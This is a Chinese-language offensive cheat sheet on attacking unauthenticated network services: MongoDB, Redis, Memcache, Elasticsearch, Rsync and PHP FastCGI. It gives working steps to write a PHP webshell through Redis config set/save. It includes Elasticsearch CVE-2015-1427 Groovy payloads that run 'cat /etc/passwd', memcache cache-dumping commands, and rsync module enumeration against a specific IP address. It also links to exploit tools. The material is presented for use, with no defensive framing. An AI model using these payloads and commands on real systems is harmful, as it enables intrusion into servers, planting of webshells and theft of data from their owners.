0x01 mongodb未授权访问
扫描服务器是否开启了端口27017,使用客户端直接连接
客户端下载 http://www.mongovue.com/downloads/
0x02 mongdb的REST接口,提供一个web界面访问,默认运行在28017端口上,扫描28017,可以直接通过浏览器访问
http://host:28017 这个借口的开启需要修改配置文件
0x03
redis没有加密方式,监听6379 tcp端口,默认redis如果没有指向监听内网地址,而对外开放,外网可以直接访问该数据库。
Redis安装
Linux版安装或下载:地址http://redis.io/download
$ wget http://download.redis.io/releases/redis-2.8.19.tar.gz
$ tar xzf redis-2.8.19.tar.gz
$ cd redis-2.8.19
$ make
$ src/redis-server //开启redis服务器即可
连接redis服务器
$src/redis-cli -h ip
可以随时执行“save”命令将当前redis的数据保存到硬盘上
可以将dir设置为一个目录a,而dbfilename为文件名b,再执行save或bgsave,则我们就可以写入一个路径为a/b的任意文件:
config set dir 网站绝对路径 //需要先知道网站绝对路径
config set dbfilename shell.php
set webshell "<?php phpinfo();?>"
save
即写入shell
0x04
memcache 是一种分布式缓存服务器,和通常使用的非分布式的ecache不同,memcache需要独立的服务器支撑,客户端通过配置IP地址和端口号(默认11211)与之连接并使用API进行数据的缓存操作。
若服务器开启了11211端口,则可以使用telnet ip 11211 或者是nc -vv ip 11211远程连接
连接后获取信息
stats items
stats cachedump <item: id> <返回结果数量,0代表返回全部>
0x05
elasticsearch安全问题
1.
elasticsearch在安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)
查看是否使用了river ---->http://localhost:9200/_cat/indices里面的indices包含了_river一般就是了
查看river详细信息---------> http://localhost:9200/_river/search
2.
Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427)
http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0 细节
exp利用
http://ip:9200/_search?pretty
POST数据
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
或者
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream().readLines()","lang": "groovy"}}}
利用工具
https://github.com/Svti/ElasticSearchEXP/
3.
另一个
Elasticsearch 代码执行漏洞利用工具
http://xxx.com:9200/_search?source=
详细:http://p2j.cn/?p=1300
0x06 Rsync安全
Rsync是一款远程同步软件安装后开放了端口873
找到开放873端口的服务器连接能否查看模块名:
rsync ip:: 详细使用过程 http://drops.wooyun.org/papers/161 http://wooyun.org/bugs/wooyun-2010-0107724eg. 首先 root@kali:~# rsync 211.144.132.46:: ------>查看所有的模块名 然后 rsync ip::模块名------->访问该模块下对应的文件 也可以猜解用户名面膜
0x07
PHP FastCGI 的远程利用
转自http://zone.wooyun.org/content/1060